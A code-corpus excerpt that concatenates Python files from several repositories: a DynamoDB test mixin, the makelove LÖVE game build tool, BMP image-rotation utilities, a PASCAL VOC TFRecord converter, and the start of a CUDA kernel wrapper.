def __repr__(self):
max_table_name_len = max(len(t.table.name) for t in self)
return "Dynamesa Tables:\n" + "\n".join(
f" {t.table.name.ljust(max_table_name_len)} ({t.table.creation_date_time:%Y-%m-%d}, {t.table.item_count} items)"
for t in self
)
tables = _TableGetter()
configure = tables.configure
class DynamoUnitTestMixin(unittest.TestCase):
dynamesa_table_name_prefix: str = ""
dynamesa_tables = []
@classmethod
def setUpClass(cls) -> None:
global tables, configure
if hasattr(cls, "dynamesa_configure"):
cls._old_table_getter = tables
cls.tables = _TableGetter()
cls.tables.configure(**cls.dynamesa_configure)
tables = cls.tables
configure = tables.configure
else:
cls._old_table_getter = tables
cls.tables = tables
if not hasattr(cls, "_old_dynamesa_table_name_prefix"):
cls._old_dynamesa_table_name_prefix = tables.table_name_prefix
tables.table_name_prefix = cls.dynamesa_table_name_prefix
super().setUpClass()
@classmethod
def tearDownClass(cls) -> None:
global tables, configure
super().tearDownClass()
tables.dynamesa_table_name_prefix = cls._old_dynamesa_table_name_prefix
tables = cls._old_table_getter
configure = tables.configure
def setUp(self) -> None:
should_replace = None
def mktable(table):
if isinstance(table, (list, tuple)):
tables.create(*table)
elif isinstance(table, dict):
tables.create(**table)
for table in self.dynamesa_tables:
try:
mktable(table)
except ClientError as e:
if e.response["Error"]["Code"] != "ResourceInUseException":
raise
if should_replace is None:
replace_answer = input(
"Couldn't create tables. Would you like to delete existing tables and replace them? [yN]"
)
should_replace = replace_answer.lower() == "y"
if not should_replace:
raise
try:
table_name = table[0]
except (KeyError, IndexError, TypeError):
table_name = table.get("table_name")
tables.delete(table_name)
mktable(table)
if should_replace:
tables.reload()
super().setUp()
def tearDown(self) -> None:
super().tearDown()
for table in tables:
table.table.delete()
``` |
{
"source": "jiaaro/makelove",
"score": 2
} |
#### File: makelove/makelove/config.py
```python
import os
import shutil
import subprocess
import sys
import re
import toml
from . import validators as val
from .util import prompt
default_config_name = "makelove.toml"
all_targets = ["win32", "win64", "appimage", "macos", "lovejs"]
all_love_versions = [
"11.3",
"11.2",
"11.1",
"11.0",
"0.10.2",
"0.10.1",
"0.10.0",
"0.9.2",
"0.9.1",
"0.9.0",
"0.8.0",
"0.7.2",
"0.7.1",
"0.7.0",
"0.6.2",
"0.6.1",
"0.6.0",
"0.5.0",
"0.4.0",
"0.3.2",
"0.3.1",
"0.3.0",
"0.2.1",
"0.2.0",
"0.1.1",
]
config_params = {
"name": val.String(),
"love_version": val.Choice(*all_love_versions),
"default_targets": val.List(val.Choice(*all_targets)),
"build_directory": val.Path(),
"icon_file": val.Path(),
"love_files": val.List(val.Path()),
"keep_game_directory": val.Bool(),
"archive_files": val.Dict(val.Path(), val.Path()),
"hooks": val.Section(
{
"prebuild": val.List(val.Command()),
"postbuild": val.List(val.Command()),
"parameters": val.Dict(val.Any(), val.Any()),
}
),
"windows": val.Section(
{
"exe_metadata": val.Dict(val.String(), val.String()),
"archive_files": val.Dict(val.Path(), val.Path()),
}
),
"win32": val.Section(
{
"love_binaries": val.Path(),
"shared_libraries": val.List(val.Path()),
"artifacts": val.ValueOrList(val.Choice("directory", "archive")),
}
),
"win64": val.Section(
{
"love_binaries": val.Path(),
"shared_libraries": val.List(val.Path()),
"artifacts": val.ValueOrList(val.Choice("directory", "archive")),
}
),
"linux": val.Section(
{"desktop_file_metadata": val.Dict(val.String(), val.String())}
),
"appimage": val.Section(
{
"source_appimage": val.Path(),
"shared_libraries": val.List(val.Path()),
"artifacts": val.ValueOrList(val.Choice("appdir", "appimage")),
}
),
"macos": val.Section(
{
"love_binaries": val.Path(),
"icon_file": val.Path(),
"app_metadata": val.Dict(val.String(), val.String()),
}
),
"lovejs": val.Section(
{
"title": val.String(),
"memory": val.String(),
}
),
}
def should_build_artifact(config, target, artifact, default):
if not target in config or not "artifacts" in config[target]:
return default
if artifact in config[target]["artifacts"]:
return True
def load_config_file(path):
with open(path) as f:
config_data = toml.load(f)
validate_config(config_data)
return config_data
def is_inside_git_repo():
return (
subprocess.run(
["git", "rev-parse", "--is-inside-work-tree"], capture_output=True
).returncode
== 0
)
def guess_name():
res = subprocess.run(["git", "rev-parse", "--show-toplevel"], capture_output=True)
if res.returncode == 0:
git_root_path = res.stdout.decode("utf-8").strip()
return os.path.basename(git_root_path)
else:
return os.path.basename(os.getcwd())
def get_default_targets():
targets = ["win32", "win64"]
if sys.platform == "linux":
targets.append("appimage")
return targets
def get_conf_filename():
candidates = ["conf.lua", "conf.moon", "conf.ts"]
for name in candidates:
if os.path.isfile(name):
print("Found {}".format(name))
return name
print("Could not find löve config file")
return None
def guess_love_version():
filename = get_conf_filename()
if filename == None:
return None
with open(filename) as f:
conf_lua = f.read()
regex = re.compile(r"(?<!--)\.version\s*=\s*\"(.*)\"")
matches = regex.findall(conf_lua)
if len(matches) == 0:
return None
elif len(matches) > 1:
print(
"Could not determine löve version unambiguously. Candidates: {}".format(
matches
)
)
return None
return matches[0]
def get_default_love_files(build_directory):
if is_inside_git_repo():
return [
"::git-ls-tree::",
"-*/.*",
]
else:
return [
"+*",
"-*/.*",
"-./{}/*".format(build_directory),
]
def validate_config(config):
try:
val.Section(config_params).validate(config)
except ValueError as exc:
sys.exit("Could not parse config:\n{}".format(exc))
def get_raw_config(config_path):
if config_path != None:
if not os.path.isfile(config_path):
sys.exit("Config file '{}' does not exist".format(config_path))
print("Loading config file '{}'".format(config_path))
return load_config_file(config_path)
else:
if os.path.isfile(default_config_name):
print("Loading config from default path '{}'".format(default_config_name))
return load_config_file(default_config_name)
else:
print("No config file found. Using default config.")
return {}
def get_config(config_path):
config = get_raw_config(config_path)
if not "name" in config:
config["name"] = guess_name()
print("Guessing project name as '{}'".format(config["name"]))
if not "love_version" in config:
conf_love_version = guess_love_version()
if conf_love_version:
config["love_version"] = conf_love_version
print(
"Guessed löve version from löve config file: {}".format(
conf_love_version
)
)
else:
config["love_version"] = "11.3" # update this manually here
print("Assuming default löve version '{}'".format(config["love_version"]))
if not "default_targets" in config:
config["default_targets"] = get_default_targets()
if not "build_directory" in config:
config["build_directory"] = "makelove-build"
print("Using default build directory '{}'".format(config["build_directory"]))
if not "love_files" in config:
config["love_files"] = get_default_love_files(config["build_directory"])
print("Using default love_files patterns: {}".format(config["love_files"]))
validate_config(config)
return config
init_config_template = """name = {name}
default_targets = [{default_targets}]
build_directory = {build_directory}
love_files = [
{love_files}
]
"""
def init_config_assistant():
if os.path.isfile(default_config_name):
sys.exit("{} already exists in this directory".format(default_config_name))
if not is_inside_git_repo():
print("If you plan on using git, please initialize the repository first!")
name = prompt("Project name")
default_targets = get_default_targets()
build_directory = prompt("Build directory", "makelove-build")
love_files = get_default_love_files(build_directory)
quote = lambda x: '"' + x.replace('"', '\\"') + '"'
config = init_config_template.format(
name=quote(name),
default_targets=", ".join(map(quote, default_targets)),
build_directory=quote(build_directory),
love_files="\n".join(" " + quote(pat) + "," for pat in love_files),
)
with open(default_config_name, "w") as f:
f.write(config)
print("Configuration written to {}".format(default_config_name))
print("You should probably adjust love_files before you build.")
```
#### File: makelove/makelove/macos.py
```python
import io
import os
import plistlib
import struct
import sys
from datetime import datetime
from zipfile import ZipFile
from urllib.request import urlopen, urlretrieve, URLError
from PIL import Image
from .util import eprint, get_default_love_binary_dir, get_download_url
def download_love(version, platform):
"""
Note, mac builds are stored as zip files because extracting them
would lose data about symlinks when building on windows
"""
target_path = get_default_love_binary_dir(version, platform)
print("Downloading love binaries to: '{}'".format(target_path))
os.makedirs(target_path, exist_ok=True)
try:
download_url = get_download_url(version, platform)
print("Downloading '{}'..".format(download_url))
urlretrieve(download_url, os.path.join(target_path, "love.zip"))
except URLError as exc:
eprint("Could not download löve: {}".format(exc))
eprint(
"If there is in fact no download on GitHub for this version, specify 'love_binaries' manually."
)
sys.exit(1)
print("Download complete")
def write_file(pkg, name, content):
if isinstance(pkg, str):
mode = "w" if isinstance(content, str) else "wb"
with open(name, mode) as f:
f.write(content)
elif isinstance(pkg, ZipFile):
pkg.writestr(name, content)
def make_icns(iconfile, icon_image_file):
"""
iconfile: an open file to write the ICNS file contents into (mode: wb)
icon_image: a PIL.Image object of the icon image
Based on code from learn-python.com:
https://learning-python.com/cgi/showcode.py?name=pymailgui-products/unzipped/build/build-icons/iconify.py
"""
icon_image = Image.open(icon_image_file)
# must all be square (width=height) and of standard pixel sizes
width, height = icon_image.size # a 2-tuple
if width != height:
eprint("Invalid image size, discarded: %d x %d." % (width, height))
sys.exit(1)
sizetotypes = {
16: [b"icp4"], # 16x16 std only (no 8x8@2x)
32: [b"icp5", b"ic11"], # 32x32 std -AND- 16x16@2x high
64: [b"icp6", b"ic12"], # 64x64 std -AND- 32x32@2x high
128: [b"ic07"], # 128x128 std only (no 64x64@2x)
256: [b"ic08", b"ic13"], # 256x256 std -AND- 128x128@2x high
512: [b"ic09", b"ic14"], # 512x512 std -AND- 256x256@2x high
1024: [b"ic10"], # 1024x1024 (10.7) = 512x512@2x high (10.8)
}
imagedatas = []
for size_px, icontypes in sizetotypes.items():
img = icon_image.resize((size_px, size_px), Image.LANCZOS)
with io.BytesIO() as img_data_f:
img.save(img_data_f, "png")
for icontype in icontypes:
imagedatas.append([icontype, img_data_f.getvalue()])
# 1) HEADER: 4-byte "magic" + 4-byte filesize (including header itself)
filelen = 8 + sum(len(imagedata) + 8 for (_, imagedata) in sorted(imagedatas))
iconfile.write(b"icns")
iconfile.write(struct.pack(">I", filelen))
# 2) IMAGE TYPE+LENGTH+BYTES: packed into rest of icon file sequentially
for icontype, imagedata in imagedatas:
# data length includes type and length fields (4+4)
iconfile.write(icontype) # 4 byte type
iconfile.write(struct.pack(">I", 8 + len(imagedata))) # 4-byte length
iconfile.write(imagedata) # and the image
def get_game_icon_content(config):
# Mac icons are not supposed to take up the full image area and generally
# have shadows, etc - allow users to provide a different design but fall
# back on the generic icon_file setting
icon_file = config.get("macos", {}).get("icon_file")
if icon_file is None:
icon_file = config.get("icon_file", None)
elif not os.path.isfile(icon_file):
sys.exit(f"Couldn't find macOS icon_file at {icon_file}")
if icon_file is None:
icon_file = config.get("icon_file", None)
elif not os.path.isfile(icon_file):
sys.exit(f"Couldn't find icon_file at {icon_file}")
if not icon_file:
return False
with io.BytesIO() as icns_f, open(icon_file, "rb") as icon_img_f:
icon_key = f"{config['name']}.app/Contents/Resources/icon-{config['name']}.icns"
if icon_file.lower().endswith(".png"):
make_icns(icns_f, icon_img_f)
return icns_f.getvalue()
else:
return icon_img_f.read()
def get_info_plist_content(config, version):
plist = {
"BuildMachineOSBuild": "19B88",
"CFBundleDevelopmentRegion": "English",
"CFBundleExecutable": "love",
"CFBundleIconFile": "icon.icns",
"CFBundleInfoDictionaryVersion": "6.0",
"CFBundlePackageType": "APPL",
"CFBundleSignature": "LoVe",
"CFBundleSupportedPlatforms": ["MacOSX"],
"DTCompiler": "com.apple.compilers.llvm.clang.1_0",
"DTPlatformBuild": "11C504",
"DTPlatformVersion": "GM",
"DTSDKBuild": "19B90",
"DTSDKName": "macosx10.15",
"DTXcode": "1130",
"DTXcodeBuild": "11C504",
"LSApplicationCategoryType": "public.app-category.games",
"LSMinimumSystemVersion": "10.7",
"NSHighResolutionCapable": True,
"NSPrincipalClass": "NSApplication",
"NSSupportsAutomaticGraphicsSwitching": False,
# dynamic defaults
"CFBundleShortVersionString": version or config["love_version"],
"CFBundleName": config["name"],
"NSHumanReadableCopyright": "© 2006-2020 LÖVE Development Team",
"CFBundleIdentifier": f"tld.yourgamename",
}
if "macos" in config and "app_metadata" in config["macos"]:
metadata = config["macos"]["app_metadata"]
plist.update(metadata)
return plistlib.dumps(plist)
def build_macos(config, version, target, target_directory, love_file_path):
if target in config and "love_binaries" in config[target]:
love_binaries = config[target]["love_binaries"]
else:
assert "love_version" in config
print("No love binaries specified for target {}".format(target))
love_binaries = get_default_love_binary_dir(config["love_version"], target)
if os.path.isdir(love_binaries):
print("Love binaries already present in '{}'".format(love_binaries))
else:
download_love(config["love_version"], target)
src = os.path.join(love_binaries, "love.zip")
dst = os.path.join(target_directory, f"{config['name']}-{target}.zip")
with open(src, "rb") as lovef, ZipFile(lovef) as love_binary_zip, open(
dst, "wb+"
) as outf, ZipFile(outf, mode="w") as app_zip, open(
love_file_path, "rb"
) as love_zip:
for zipinfo in love_binary_zip.infolist():
if not zipinfo.filename.startswith("love.app/"):
eprint("Got bad or unxpexpectedly formatted love zip file")
sys.exit(1)
# for getting files out of the original love archive
orig_filename = zipinfo.filename
# rename app from "love.app" to "cool game.app"
zipinfo.filename = config["name"] + zipinfo.filename[len("love") :]
# makes the modification time on the app correct
zipinfo.date_time = tuple(datetime.now().timetuple()[:6])
if orig_filename == "love.app/Contents/Resources/GameIcon.icns":
continue # not needed for game distributions
elif orig_filename == "love.app/Contents/Resources/Assets.car":
continue # not needed for game distributions
elif orig_filename == "love.app/Contents/Resources/OS X AppIcon.icns":
# hack: change name to make macos pick up the icon
zipinfo = f"{config['name']}.app/Contents/Resources/icon.icns"
content = get_game_icon_content(config)
if not content:
content = love_binary_zip.read(orig_filename)
elif orig_filename == "love.app/Contents/Info.plist":
app_zip.writestr(
zipinfo.filename, get_info_plist_content(config, version)
)
continue
else:
content = love_binary_zip.read(orig_filename)
app_zip.writestr(zipinfo, content)
loveZipKey = f"{config['name']}.app/Contents/Resources/{config['name']}.love"
app_zip.writestr(loveZipKey, love_zip.read())
```
#### File: makelove/makelove/makelove.py
```python
import argparse
import os
import shutil
import sys
import json
import subprocess
from email.utils import formatdate
import zipfile
import re
import pkg_resources
from .config import get_config, all_targets, init_config_assistant
from .hooks import execute_hook
from .filelist import FileList
from .jsonfile import JsonFile
from .windows import build_windows
from .linux import build_linux
from .macos import build_macos
from .lovejs import build_lovejs
all_hooks = ["prebuild", "postbuild"]
# Sadly argparse cannot handle nargs="*" and choices and will error if not at least one argument is provided
def _choices(values):
def f(s):
if s not in values:
raise argparse.ArgumentTypeError(
"Invalid choice. Options: {}".format(", ".join(values))
)
return s
return f
def files_in_dir(dir_path):
ret = []
for root, _dirs, files in os.walk(dir_path):
for f in files:
ret.append(os.path.join(root, f))
return ret
# Obviously this cannot bump everything, just bump the trailing number
def bump_version(version):
m = re.search(r"\d+$", version)
if not m:
sys.exit("Could not bump version '{}'".format(version))
num = int(m.group(0)) + 1
return version[: m.start(0)] + str(num)
def get_build_log_path(build_directory):
return os.path.join(build_directory, ".makelove-buildlog")
def prepare_build_directory(args, config, version):
assert "build_directory" in config
build_directory = config["build_directory"]
versioned_build = version != None
if versioned_build:
# Pretend the build directory is the version directory
# I think this is somewhat hacky, but also nice at the same time
build_directory = os.path.join(build_directory, version)
if os.path.isdir(build_directory):
# If no version is specified, overwrite by default
built_targets = os.listdir(build_directory)
building_target_again = any(target in built_targets for target in args.targets)
# If the targets being built have not been built before, it should be fine to not do anything
# The deletion/creation of the target directories is handled in main() (they are just deleted if they exist).
if versioned_build and building_target_again and not args.force:
sys.exit(
"Cannot rebuild an already built version + target combination. Remove it manually first or pass --force to overwrite it"
)
elif os.path.exists(build_directory):
sys.exit("Build directory exists and is not a directory")
else:
os.makedirs(build_directory)
return build_directory
def execute_hooks(hook, config, version, targets, build_directory):
if "hooks" in config and hook in config["hooks"]:
for command in config["hooks"][hook]:
new_config = execute_hook(
command, config, version, targets, build_directory
)
config.clear()
config.update(new_config)
def git_ls_tree(path=".", visited=None):
p = os.path
if visited == None:
visited = set()
rpath = p.realpath(path)
if rpath in visited:
sys.exit("Symlink loop detected!")
else:
visited.add(rpath)
ls_tree = (
subprocess.check_output(
["git", "ls-tree", "-r", "--name-only", "HEAD"], cwd=path
)
.decode("utf-8")
.splitlines()
)
out = []
for item in ls_tree:
item_path = p.join(path, item)
if p.islink(item_path) and p.isdir(item_path):
out.extend(git_ls_tree(item_path, visited))
else:
out.append(item_path)
return out
def assemble_game_directory(args, config, game_directory):
if os.path.isdir(game_directory):
shutil.rmtree(game_directory)
os.makedirs(game_directory)
file_list = FileList(".")
for rule in config["love_files"]:
if rule == "+::git-ls-tree::" or rule == "::git-ls-tree::":
ls_tree = git_ls_tree(".")
for item in ls_tree:
try:
file_list.include_raw(item)
except FileNotFoundError:
sys.exit("Could not find git-tracked file '{}'".format(item))
elif rule[0] == "-":
file_list.exclude(rule[1:])
elif rule[0] == "+":
file_list.include(rule[1:])
else:
file_list.include(rule)
if args.verbose:
print(".love files:")
for fname in file_list:
if args.verbose:
print(fname)
dest_path = os.path.join(game_directory, fname)
os.makedirs(os.path.dirname(dest_path), exist_ok=True)
shutil.copyfile(fname, dest_path)
def create_love_file(game_dir, love_file_path):
love_archive = zipfile.ZipFile(love_file_path, "w")
for path in files_in_dir(game_dir):
arcname = os.path.normpath(os.path.relpath(path, game_dir))
love_archive.write(path, arcname=arcname)
love_archive.close()
def get_build_version(args, config):
build_log_path = get_build_log_path(config["build_directory"])
# Bump version if we are doing a versioned build and no version is specified
were_versioned_builds_made = os.path.isfile(build_log_path)
if were_versioned_builds_made and args.version == None:
print(
"Versioned builds were made in the past, but no version was specified for this build. Bumping last built version."
)
with open(build_log_path) as f:
build_log = json.load(f)
last_built_version = build_log[-1]["version"]
return bump_version(last_built_version)
return args.version
def get_targets(args, config):
targets = args.targets
if len(targets) == 0:
assert "default_targets" in config
targets = config["default_targets"]
# use this lame loop to make unique but keep target order
unique_targets = []
for target in targets:
if target not in unique_targets:
unique_targets.append(target)
targets = unique_targets
return targets
def main():
parser = argparse.ArgumentParser(prog="makelove")
parser.add_argument(
"--init",
action="store_true",
help="Start assistant to create a new configuration.",
)
parser.add_argument(
"--config",
help="Specify config file manually. If not specified 'makelove.toml' in the current working directory is used.",
)
parser.add_argument(
"-d",
"--disable-hook",
default=[],
dest="disabled_hooks",
action="append",
choices=all_hooks + ["all"],
)
parser.add_argument(
"--force",
dest="force",
action="store_true",
help="If doing a versioned build, specify this to overwrite a target that was already built.",
)
parser.add_argument(
"--resume",
action="store_true",
help="If doing an unversioned build, specify this to not rebuild targets that were already built.",
)
parser.add_argument(
"--verbose",
action="store_true",
help="Display more information (files included in love archive)",
)
# Restrict version name format somehow? A git refname?
parser.add_argument(
"-n",
"--version-name",
dest="version",
help="Specify the name of the version to be built.",
)
parser.add_argument(
"--check",
action="store_true",
help="Only load config and check some arguments, then exit without doing anything. This is mostly useful development.",
)
parser.add_argument(
"--version",
dest="display_version",
action="store_true",
help="Output the makelove version and exit.",
)
parser.add_argument(
"targets",
nargs="*",
type=_choices(all_targets),
default=[],
help="Options: {}".format(", ".join(all_targets)),
)
args = parser.parse_args()
if args.display_version:
print("makelove {}".format(pkg_resources.get_distribution("makelove").version))
sys.exit(0)
if not os.path.isfile("main.lua"):
print(
"There is no main.lua present in the current directory! Unless you use MoonScript, this might be a mistake."
)
if args.init:
init_config_assistant()
sys.exit(0)
config = get_config(args.config)
version = get_build_version(args, config)
if version != None:
print("Building version '{}'".format(version))
if "all" in args.disabled_hooks:
args.disabled_hooks = all_hooks
if args.check:
print("Exiting because --check was passed.")
sys.exit(0)
build_directory = prepare_build_directory(args, config, version)
targets = get_targets(args, config)
if sys.platform.startswith("win") and "appimage" in targets:
sys.exit("Currently AppImages can only be built on Linux and WSL2!")
build_log_path = get_build_log_path(config["build_directory"])
print("Building targets:", ", ".join(targets))
if version != None:
with JsonFile(build_log_path, indent=4) as build_log:
build_log.append(
{
"version": version,
"build_time": formatdate(localtime=True),
"targets": targets,
"completed": False,
}
)
if not "prebuild" in args.disabled_hooks:
execute_hooks("prebuild", config, version, targets, build_directory)
love_directory = os.path.join(build_directory, "love")
love_file_path = os.path.join(love_directory, "{}.love".format(config["name"]))
game_directory = os.path.join(love_directory, "game_directory")
# This hold for both the löve file and the targets below:
# If we do a versioned build and reached this place, force/--force
# was passed, so we can just delete stuff.
rebuild_love = version != None or not args.resume
if not os.path.isfile(love_file_path) or rebuild_love:
print("Assembling game directory..")
assemble_game_directory(args, config, game_directory)
if not os.path.isfile(os.path.join(game_directory, "main.lua")):
sys.exit(
"Your game directory does not contain a main.lua. This will result in a game that can not be run."
)
create_love_file(game_directory, love_file_path)
print("Created {}".format(love_file_path))
if config.get("keep_game_directory", False):
print("Keeping game directory because 'keep_game_directory' is true")
else:
shutil.rmtree(game_directory)
else:
print(".love file already exists. Not rebuilding.")
for target in targets:
print(">> Building target {}".format(target))
target_directory = os.path.join(build_directory, target)
# If target_directory is not a directory, let it throw an exception
# We can overwrite here
if os.path.exists(target_directory):
shutil.rmtree(target_directory)
os.makedirs(target_directory)
if target == "win32" or target == "win64":
build_windows(config, version, target, target_directory, love_file_path)
elif target == "appimage":
build_linux(config, version, target, target_directory, love_file_path)
elif target == "macos":
build_macos(config, version, target, target_directory, love_file_path)
elif target == "lovejs":
build_lovejs(config, version, target, target_directory, love_file_path)
print("Target {} complete".format(target))
if not "postbuild" in args.disabled_hooks:
execute_hooks("postbuild", config, version, targets, build_directory)
if version != None:
with JsonFile(build_log_path, indent=4) as build_log:
build_log[-1]["completed"] = True
if __name__ == "__main__":
main()
```
#### File: makelove/makelove/validators.py
```python
class Section(object):
def __init__(self, params):
self.params = params
def validate(self, obj):
if not isinstance(obj, dict):
raise ValueError
for param in obj:
if param not in self.params:
raise ValueError("Unknown parameter '{}'".format(param))
try:
self.params[param].validate(obj[param])
except ValueError as exc:
if len(str(exc)) == 0:
raise ValueError(
"Invalid value for parameter '{}'. Expected: {}".format(
param, self.params[param].description()
)
)
else:
raise
return obj
def description(self):
return "Section"
class Bool(object):
def validate(self, obj):
if not isinstance(obj, bool):
raise ValueError
return obj
def description(self):
return "Boolean"
class String(object):
def validate(self, obj):
if not isinstance(obj, str):
raise ValueError
return obj
def description(self):
return "String"
class Any(object):
def validate(self, obj):
return obj
def description(self):
return "Any value"
class Choice(object):
def __init__(self, *choices):
self.choices = choices
def validate(self, obj):
if not obj in self.choices:
raise ValueError
return obj
def description(self):
return "One of [{}]".format(", ".join(self.choices))
# This validator is mostly used for documentation, since on Linux
# for example almost anything could be a path
class Path(object):
def validate(self, obj):
if not isinstance(obj, str):
raise ValueError
return obj
def description(self):
return "Path"
# Same as path
class Command(object):
def validate(self, obj):
if not isinstance(obj, str):
raise ValueError
return obj
def description(self):
return "Command"
class List(object):
def __init__(self, value_validator):
self.value_validator = value_validator
def validate(self, obj):
if not isinstance(obj, list):
raise ValueError
for value in obj:
self.value_validator.validate(value)
return obj
def description(self):
return "List({})".format(self.value_validator.description())
class Dict(object):
def __init__(self, key_validator, value_validator):
self.key_validator = key_validator
self.value_validator = value_validator
def validate(self, obj):
if not isinstance(obj, dict):
raise ValueError
for k, v in obj.items():
self.key_validator.validate(k)
self.value_validator.validate(v)
return obj
def description(self):
return "Dictionary(key = {}, value = {})".format(
self.key_validator.description(), self.value_validator.description()
)
class Option(object):
def __init__(self, *option_validators):
self.option_validators = option_validators
def validate(self, obj):
for option in self.option_validators:
try:
option.validate(obj)
return obj
except ValueError:
pass
raise ValueError
def description(self):
return "Option({})".format(
", ".join(option.description() for option in self.option_validators)
)
def ValueOrList(value_validator):
return Option(value_validator, List(value_validator))
``` |
{
"source": "jiabailie/image-processing",
"score": 2
} |
#### File: summer/base/bmp_struct_header.py
```python
from summer.tools.utils import Utils
class BmpStructHeader:
def __init__(self):
self.biSize = Utils.i_to_bytes(0, 4) # bmp header size
self.biWidth = Utils.i_to_bytes(0, 4)
self.biHeight = Utils.i_to_bytes(0, 4)
self.biPlanes = Utils.i_to_bytes(0, 2) # default 1
self.biBitCount = Utils.i_to_bytes(0, 2) # one pixel occupy how many bits
self.biCompression = Utils.i_to_bytes(0, 4)
self.biSizeImage = Utils.i_to_bytes(0, 4)
self.biXPelsPerMeter = Utils.i_to_bytes(0, 4)
self.biYPelsPerMeter = Utils.i_to_bytes(0, 4)
self.biClrUsed = Utils.i_to_bytes(0, 4)
self.biClrImportant = Utils.i_to_bytes(0, 4)
```
#### File: summer/operations/rotating.py
```python
import math
from summer.tools.utils import Utils
from summer.base.bmp import Bmp
class Rotating(Bmp):
def __init__(self):
super().__init__()
def rotate(self):
self.rotate_with_degree(90)
"""
reference: http://blog.csdn.net/liyuan02/article/details/6750828
attention: in the loop, the x in real bmp is represent y, the y same too.
"""
def rotate_with_degree(self, degree):
cos_degree = math.cos(math.radians(degree))
sin_degree = math.sin(math.radians(degree))
h = math.ceil(self.height * cos_degree
+ self.width * sin_degree)
w = math.ceil(self.height * sin_degree
+ self.width * cos_degree)
h = abs(h)
w = abs(w)
if w % 4 != 0:
w -= w % 4
dx = -0.5 * w * cos_degree - 0.5 * h * sin_degree + 0.5 * self.width
dy = 0.5 * w * sin_degree - 0.5 * h * cos_degree + 0.5 * self.height
new_bits = [b''] * w * h * 3
for x in range(0, h):
for y in range(0, w):
x0 = y * cos_degree + x * sin_degree + dx
y0 = -y * sin_degree + x * cos_degree + dy
src_index = round(y0) * self.width_step + round(x0) * self.bit_count
dst_index = x * w * self.bit_count + y * self.bit_count
if len(self.bits) - self.bit_count > src_index >= 0:
new_bits[dst_index + 2] = self.bits[src_index + 2]
new_bits[dst_index + 1] = self.bits[src_index + 1]
new_bits[dst_index] = self.bits[src_index]
else:
new_bits[dst_index + 2] = Utils.i_to_bytes(255, 1)
new_bits[dst_index + 1] = Utils.i_to_bytes(255, 1)
new_bits[dst_index] = Utils.i_to_bytes(255, 1)
self.bits = new_bits
self.biWidth = Utils.i_to_bytes(w, 4)
self.biHeight = Utils.i_to_bytes(h, 4)
```
#### File: summer/tools/utils.py
```python
class Utils:
@staticmethod
def i_to_bytes(number, length, byteorder='little'):
return number.to_bytes(length, byteorder)
@staticmethod
def bytes_to_i(mbytes, byteorder='little'):
return int.from_bytes(mbytes, byteorder)
``` |
{
"source": "jiabaocui/SEGS",
"score": 2
} |
#### File: SEGS/datasets/pasval_voc_writer.py
```python
import os
import random
import xml.etree.ElementTree as ET
import tensorflow as tf
def int64_feature(value):
"""Wrapper for inserting int64 features into Example proto.
"""
if not isinstance(value, list):
value = [value]
return tf.train.Feature(int64_list=tf.train.Int64List(value=value))
def float_feature(value):
"""Wrapper for inserting float features into Example proto.
"""
if not isinstance(value, list):
value = [value]
return tf.train.Feature(float_list=tf.train.FloatList(value=value))
def bytes_feature(value):
"""Wrapper for inserting bytes features into Example proto.
"""
if not isinstance(value, list):
value = [value]
return tf.train.Feature(bytes_list=tf.train.BytesList(value=value))
DEFUALT_PATHS = {
'images': '/mnt/disk/chenyifeng/VOC2012/JPEGImages',
'annotations': '/mnt/disk/chenyifeng/VOC2012/Annotations',
'segmentations': '/mnt/disk/chenyifeng/VOC2012/SegmentationClassAug'
}
class PascalVocWriter:
"""
PASCAL VOC 2012 DataSet to TF record Writer
"""
def __init__(self, paths=DEFUALT_PATHS):
self.img_path = paths['images']
self.ano_path = paths['annotations']
self.sgm_path = paths['segmentations']
def convert_to_example(self, file_name):
img_path = os.path.join(self.img_path, file_name + '.jpg')
ano_path = os.path.join(self.ano_path, file_name + '.xml')
sgm_path = os.path.join(self.sgm_path, file_name + '.png')
img_data = tf.gfile.FastGFile(img_path, 'rb').read()
sgm_data = tf.gfile.FastGFile(sgm_path, 'rb').read()
# img_data = imread(img_path).tostring()
# sgm_data = imread(sgm_path).tostring()
anno_tree = ET.parse(ano_path)
anno_root = anno_tree.getroot()
# is_sgmt = int(anno_root.find('segmented').text)
# if is_sgmt == 0:
# print('{} is not a Segmentation Sample. So Skipped'.format(file_name))
size = anno_root.find('size')
shape = [int(size.find('height').text),
int(size.find('width').text),
int(size.find('depth').text)]
image_format = b'JPEG'
segment_format = b'PNG'
example = tf.train.Example(
features=tf.train.Features(
feature={
'image/name':bytes_feature(file_name.encode()),
'image/height': int64_feature(shape[0]),
'image/width': int64_feature(shape[1]),
'image/channels': int64_feature(shape[2]),
'image/shape': int64_feature(shape),
'image/format': bytes_feature(image_format),
'image/encoded': bytes_feature(img_data),
'label/format': bytes_feature(segment_format),
'label/encoded': bytes_feature(sgm_data)
}
)
)
return example
def add_to_record(self, file_name, tfrecord_writer):
example = self.convert_to_example(file_name)
tfrecord_writer.write(example.SerializeToString())
def run(self, pic_names, output_dir, shuffling=False, size=300):
if shuffling:
random.seed(1314)
random.shuffle(pic_names)
total_num = len(pic_names)
for start in range(0, total_num, size):
tf_filename = '%s/%03d.tfrecord' % (output_dir, start // size)
tf_recorder = tf.python_io.TFRecordWriter(tf_filename)
print('=>' * (start * 5 // total_num) + '{:.0f}% Finished'.format(start / total_num * 100))
for pic_idx in range(start, min(start + 300, total_num)):
pic_name = pic_names[pic_idx]
self.add_to_record(pic_name, tf_recorder)
print('=>' * 5 + '{:.0f}% Finished'.format(100))
def convert_val():
writer = PascalVocWriter()
pic_names = open('/mnt/disk/chenyifeng/VOC2012/ImageSets/Segmentation/val.txt').readlines()
pic_names = [i.strip(' \n') for i in pic_names]
writer.run(pic_names, output_dir='/mnt/disk/chenyifeng/VOC2012/tf_segments/tf_records/val')
def convert_train():
writer = PascalVocWriter()
pic_names = open('/mnt/disk/chenyifeng/VOC2012/ImageSets/Segmentation/train.txt').readlines()
pic_names = [i.strip(' \n') for i in pic_names]
writer.run(pic_names, output_dir='/mnt/disk/chenyifeng/VOC2012/tf_segments/tf_records/train')
if __name__ == '__main__':
# convert_train()
convert_val()
``` |
{
"source": "JIABI/GhostShiftAddNet",
"score": 3
} |
#### File: unoptimized/kernels/kernels.py
```python
import torch
try:
import unoptimized_cuda
except:
print("Unable to import CUDA unoptimized kernels")
def linear(input, weight, bias):
out = torch.zeros([input.size(0), weight.size(0)], dtype=torch.float, device=torch.device('cuda:0'))
if bias is not None:
unoptimized_cuda.UNOPTIMIZED_LINEAR(input, weight, bias, out)
else:
temp = torch.zeros([weight.size(0)], dtype=torch.float, device=torch.device('cuda:0'))
